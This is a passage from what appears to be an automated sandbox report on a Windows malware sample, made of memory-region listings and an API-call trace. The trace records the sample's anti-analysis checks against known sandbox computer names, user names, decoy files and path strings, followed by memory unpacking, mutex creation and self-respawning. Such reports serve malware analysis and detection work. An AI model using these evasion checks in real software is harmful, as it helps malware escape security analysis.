"sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1303 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1304 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742de6b5 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 1305 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x1e0000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1306 start_va = 0x2f0000 end_va = 0x2f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1307 start_va = 0x1bd0000 end_va = 0x1ccffff entry_point = 0x0 region_type = private name = "private_0x0000000001bd0000" filename = "" Region: id = 1308 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 1309 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1310 start_va = 0x300000 end_va = 0x35bfff entry_point = 0x3235b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1311 start_va = 0x300000 end_va = 0x35bfff entry_point = 0x3235b9 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1312 start_va = 0x75340000 end_va = 0x7534bfff entry_point = 0x753410e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1313 start_va = 0x739d0000 end_va = 0x73a0ffff entry_point = 0x739da2dd region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1314 start_va = 0x9c0000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 1315 start_va = 0x1d50000 end_va = 0x1e4ffff entry_point = 0x0 region_type = private name = "private_0x0000000001d50000" filename = "" Region: id = 1316 start_va = 0x1e50000 end_va = 0x1f2efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e50000" filename = "" Region: id = 1317 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 1318 start_va = 0x300000 end_va = 0x323fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1319 start_va = 0x735e0000 end_va = 0x736dafff entry_point = 0x735f17e1 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1320 start_va = 0x330000 end_va = 0x330fff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1321 start_va = 0x340000 end_va = 0x348fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1322 start_va = 0x350000 end_va = 0x373fff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1323 start_va = 0x380000 end_va = 0x388fff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 1324 start_va = 0x1f30000 end_va = 0x202ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 1325 start_va = 0x71510000 end_va = 0x7155bfff entry_point = 0x71512c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1326 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1327 start_va = 0x9c0000 end_va = 0xa07fff entry_point = 0x0 region_type = private name = "private_0x00000000009c0000" filename = "" Region: id = 1328 start_va = 0xa80000 end_va = 0xabffff entry_point = 0x0 region_type = private name = "private_0x0000000000a80000" filename = "" Region: id = 1329 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1330 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1331 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1332 start_va = 0x300000 end_va = 0x311fff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 1333 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1334 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1335 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1336 start_va = 0xa10000 end_va = 0xa57fff entry_point = 0x0 region_type = private name = "private_0x0000000000a10000" filename = "" Region: id = 1337 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1338 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1339 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1340 start_va = 0x340000 end_va = 0x351fff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1341 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1342 start_va = 0x61140000 end_va = 0x62495fff entry_point = 0x61140000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1343 start_va = 0x624a0000 end_va = 0x637f5fff entry_point = 0x624a0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1344 start_va = 0x360000 end_va = 0x371fff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 1345 start_va = 0x320000 end_va = 0x32cfff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1346 start_va = 0x75320000 end_va = 0x7533afff entry_point = 0x753293b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 1347 start_va = 0x380000 end_va = 0x38cfff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Thread: id = 64 os_tid = 0xbe0 [0068.388] GetConsoleCP () returned 0x0 [0068.414] GetMUILanguage () returned 0x0 [0068.415] ConvertFiberToThread () returned 0 [0068.415] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x76890000 [0068.416] GetProcAddress (hModule=0x76890000, lpProcName="ReleaseCapture") returned 0x768c69f2 [0068.416] ReleaseCapture () returned 1 [0068.416] GetProcAddress (hModule=0x76890000, lpProcName="GetProcessWindowStation") returned 0x7689dfdc [0068.416] GetProcessWindowStation () returned 0x30 [0068.417] SHGetFileInfoA (in: pszPath="", dwFileAttributes=0x0, psfi=0x2ef948, cbFileInfo=0x160, uFlags=0x4200 | out: psfi=0x2ef948) returned 0x3c7dd0 [0068.537] GetProcAddress (hModule=0x76890000, lpProcName="GetCaretBlinkTime") returned 0x768a0d01 [0068.537] GetCaretBlinkTime () returned 0x212 [0068.537] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2ef63c | out: ProcedureAddress=0x2ef63c*=0x765e2fb6) returned 0x0 [0068.537] VirtualAlloc (lpAddress=0x0, dwSize=0x12000, flAllocationType=0x1000, flProtect=0x4) returned 0x360000 [0068.542] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2ef65c | out: ProcedureAddress=0x2ef65c*=0x765e2fb6) returned 0x0 [0068.542] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x40) returned 0x320000 [0068.543] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x2ef73c | out: ProcedureAddress=0x2ef73c*=0x765e395c) returned 0x0 [0068.543] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x2ef73c | out: ProcedureAddress=0x2ef73c*=0x765e33d3) returned 0x0 [0068.543] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualAlloc", Ordinal=0x0, ProcedureAddress=0x2ef73c | out: ProcedureAddress=0x2ef73c*=0x765e2fb6) returned 0x0 [0068.543] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x2ef73c | out: ProcedureAddress=0x2ef73c*=0x765d2341) returned 0x0 [0068.543] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="UnmapViewOfFile", Ordinal=0x0, ProcedureAddress=0x2ef73c | out: ProcedureAddress=0x2ef73c*=0x765ddb13) returned 0x0 [0068.543] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="AddVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x2ef73c | out: ProcedureAddress=0x2ef73c*=0x772af774) returned 0x0 [0068.543] LdrGetProcedureAddress (in: BaseAddress=0x76590000, Name="RemoveVectoredExceptionHandler", Ordinal=0x0, ProcedureAddress=0x2ef73c | out: ProcedureAddress=0x2ef73c*=0x7731ad2e) returned 0x0 [0068.543] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0068.543] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleFileNameA") returned 0x765e33f6 [0068.543] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameA") returned 0x765c6ba9 [0068.543] GetProcAddress (hModule=0x76590000, lpProcName="CloseHandle") returned 0x765dca7c [0068.544] GetProcAddress (hModule=0x76590000, lpProcName="lstrcmpA") returned 0x765c8c59 [0068.544] GetProcAddress (hModule=0x76590000, lpProcName="FreeConsole") returned 0x7663bfde [0068.544] GetProcAddress (hModule=0x76590000, lpProcName="GetComputerNameExA") returned 0x7661f41f [0068.544] GetProcAddress (hModule=0x76590000, lpProcName="GetModuleHandleA") returned 0x765dcf41 [0068.544] GetProcAddress (hModule=0x76590000, lpProcName="CreateFileA") returned 0x765dcee8 [0068.544] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x764f0000 [0068.544] GetProcAddress (hModule=0x764f0000, lpProcName="GetUserNameA") returned 0x7651a4b4 [0068.544] LoadLibraryA (lpLibFileName="SHLWAPI.dll") returned 0x76b40000 [0068.544] GetProcAddress (hModule=0x76b40000, lpProcName="StrStrIA") returned 0x76b4d250 [0068.544] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x772a0000 [0068.544] GetProcAddress (hModule=0x772a0000, lpProcName="strchr") returned 0x772e7690 [0068.544] GetUserNameA (in: lpBuffer=0x2ef66c, pcbBuffer=0x2ef468 | out: lpBuffer="BGC6u8Oy yXGxkR", pcbBuffer=0x2ef468) returned 1 [0068.547] GetComputerNameA (in: lpBuffer=0x2ef56c, nSize=0x2ef468 | out: lpBuffer="F71GWAT", nSize=0x2ef468) returned 1 [0068.547] GetComputerNameExA (in: NameType=0x1, lpBuffer=0x2ef46c, nSize=0x2ef468 | out: lpBuffer="F71gwat", nSize=0x2ef468) returned 1 [0068.547] lstrcmpA (lpString1="F71GWAT", lpString2="TEQUILABOOMBOOM") returned -1 [0068.547] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="Wilbert") returned -1 [0068.547] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0068.547] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="admin") returned 1 [0068.547] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John Doe") returned -1 [0068.547] lstrcmpA (lpString1="BGC6u8Oy yXGxkR", lpString2="John") returned -1 [0068.547] CreateFileA (lpFileName="C:\\email.doc" (normalized: "c:\\email.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0068.548] CloseHandle (hObject=0xffffffff) returned 0 [0068.548] CreateFileA (lpFileName="C:\\a\\foobar.bmp" (normalized: "c:\\a\\foobar.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0068.548] CloseHandle (hObject=0xffffffff) returned 0 [0068.548] GetModuleHandleA (lpModuleName=0x0) returned 0xc40000 [0068.548] GetModuleFileNameA (in: hModule=0xc40000, lpFilename=0x2ef67c, nSize=0x103 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe")) returned 0x4d [0068.548] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", lpSrch="sample") returned 0x0 [0068.548] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", lpSrch="mlwr_smpl") returned 0x0 [0068.548] StrStrIA (lpFirst="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", lpSrch="artifact.exe") returned 0x0 [0068.548] VirtualAlloc (lpAddress=0x0, dwSize=0xd000, flAllocationType=0x1000, flProtect=0x4) returned 0x380000 [0068.550] LoadLibraryA (lpLibFileName="KERNEL32.dll") returned 0x76590000 [0068.550] GetProcAddress (hModule=0x76590000, lpProcName="WTSGetActiveConsoleSessionId") returned 0x765c480b [0068.550] FreeConsole () returned 0 [0068.550] VirtualProtect (in: lpAddress=0x381000, dwSize=0x88aa, flNewProtect=0x20, lpflOldProtect=0x2ef764 | out: lpflOldProtect=0x2ef764*=0x4) returned 1 [0068.550] VirtualProtect (in: lpAddress=0x38a000, dwSize=0xb12, flNewProtect=0x2, lpflOldProtect=0x2ef764 | out: lpflOldProtect=0x2ef764*=0x4) returned 1 [0068.550] VirtualProtect (in: lpAddress=0x38b000, dwSize=0xbd8, flNewProtect=0x4, lpflOldProtect=0x2ef764 | out: lpflOldProtect=0x2ef764*=0x4) returned 1 [0068.550] VirtualProtect (in: lpAddress=0x38c000, dwSize=0x4dc, flNewProtect=0x2, lpflOldProtect=0x2ef764 | out: lpflOldProtect=0x2ef764*=0x4) returned 1 [0068.550] VirtualProtect (in: lpAddress=0x380000, dwSize=0x400, flNewProtect=0x2, lpflOldProtect=0x2ef764 | out: lpflOldProtect=0x2ef764*=0x4) returned 1 [0070.304] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ef888, nSize=0x104 | out: lpFilename="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe")) returned 0x4d [0070.304] _snwprintf (in: _Dest=0x2efa90, _Count=0x40, _Format="E%X" | out: _Dest="EB66D4A35") returned 9 [0070.304] _snwprintf (in: _Dest=0x2efb10, _Count=0x40, _Format="M%X" | out: _Dest="MB66D4A35") returned 9 [0070.304] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="EB66D4A35") returned 0x114 [0070.304] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=1, lpName="MB66D4A35") returned 0x118 [0070.305] GetLastError () returned 0x0 [0070.305] CreateProcessW (in: lpApplicationName="C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x2efb90*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x80, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x2efbd4 | out: lpCommandLine=0x0, lpProcessInformation=0x2efbd4*(hProcess=0x120, hThread=0x11c, dwProcessId=0xbec, dwThreadId=0xbf0)) returned 1 [0070.307] WaitForSingleObject (hHandle=0x114, dwMilliseconds=0xffffffff) returned 0x0 [0072.212] CloseHandle (hObject=0x120) returned 1 [0072.212] CloseHandle (hObject=0x11c) returned 1 [0072.212] CloseHandle (hObject=0x114) returned 1 [0072.212] CloseHandle (hObject=0x118) returned 1 [0072.212] ExitProcess (uExitCode=0x0) Thread: id = 65 os_tid = 0xbe4 Thread: id = 66 os_tid = 0xbe8 Process: id = "9" image_name = "ekgeobhbhtp7rxmh.exe" filename = "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe" page_root = "0x7eef76c0" os_pid = "0xbec" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0xbdc" cmd_line = "\"C:\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe\"" cur_dir = "C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\" os_username = "F71GWAT\\BGC6u8Oy yXGxkR" os_groups = "F71GWAT\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fcb0" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1348 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1349 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1350 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 1351 start_va = 0xc40000 end_va = 0xc5afff entry_point = 0xc41d90 region_type = mapped_file name = "ekgeobhbhtp7rxmh.exe" filename = "\\Users\\BGC6u8Oy yXGxkR\\AppData\\Local\\Microsoft\\Windows\\ekgEobhbhTp7rXMh.exe" (normalized: "c:\\users\\bgc6u8oy yxgxkr\\appdata\\local\\microsoft\\windows\\ekgeobhbhtp7rxmh.exe") Region: id = 1352 start_va = 0x772a0000 end_va = 0x773dbfff entry_point = 0x772a0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1353 start_va = 0x774e0000 end_va = 0x774e0fff entry_point = 0x774e0000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1354 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1355 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 1356 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1357 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1358 start_va = 0x50000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1359 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1360 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 1361 start_va = 0x6eb50000 end_va = 0x6ebd3fff entry_point = 0x6eb519a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1362 start_va = 0x75470000 end_va = 0x754b9fff entry_point = 0x75477de0 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1363 start_va = 0x754c0000 end_va = 0x754e6fff entry_point = 0x754c58b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1364 start_va = 0x756d0000 end_va = 0x756e1fff entry_point = 0x756d1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" (normalized: "c:\\windows\\system32\\devobj.dll") Region: id = 1365 start_va = 0x756f0000 end_va = 0x75708fff entry_point = 0x756f4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1366 start_va = 0x75710000 end_va = 0x757b0fff entry_point = 0x75742433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1367 start_va = 0x758a0000 end_va = 0x764e9fff entry_point = 0x75921601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1368 start_va = 0x764f0000 end_va = 0x7658ffff entry_point = 0x765049e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1369 start_va = 0x76590000 end_va = 0x76663fff entry_point = 0x765dbde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1370 start_va = 0x76780000 end_va = 0x7682bfff entry_point = 0x7678a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1371 start_va = 0x76830000 end_va = 0x76839fff entry_point = 0x7683136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1372 start_va = 0x76840000 end_va = 0x7688dfff entry_point = 0x76849c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1373 start_va = 0x76890000 end_va = 0x76958fff entry_point = 0x768ad711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1374 start_va = 0x769a0000 end_va = 0x76b3cfff entry_point = 0x769a17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" (normalized: "c:\\windows\\system32\\setupapi.dll") Region: id = 1375 start_va = 0x76b40000 end_va = 0x76b96fff entry_point = 0x76b59ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1376 start_va = 0x76ba0000 end_va = 0x76c2efff entry_point = 0x76ba3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1377 start_va = 0x76e60000 end_va = 0x76efcfff entry_point = 0x76e93fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1378 start_va = 0x77140000 end_va = 0x7729bfff entry_point = 0x7718ba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1379 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1380 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 1381 start_va = 0x757c0000 end_va = 0x7588bfff entry_point = 0x757c168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1382 start_va = 0x77400000 end_va = 0x7741efff entry_point = 0x77401355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1383 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1384 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 1385 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 1386 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 1387 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1388 start_va = 0x590000 end_va = 0x982fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1389 start_va = 0xaf0000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 1390 start_va = 0xc60000 end_va = 0x185ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c60000" filename = "" Region: id = 1391 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001e0000" filename = "" Region: id = 1392 start_va = 0x1860000 end_va = 0x1b2efff entry_point = 0x1860000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1393 start_va = 0x2f0000 end_va = 0x2f1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 1394 start_va = 0x742b0000 end_va = 0x7444dfff entry_point = 0x742de6b5 region_type = mapped_file name = "comctl32.dll" filename = 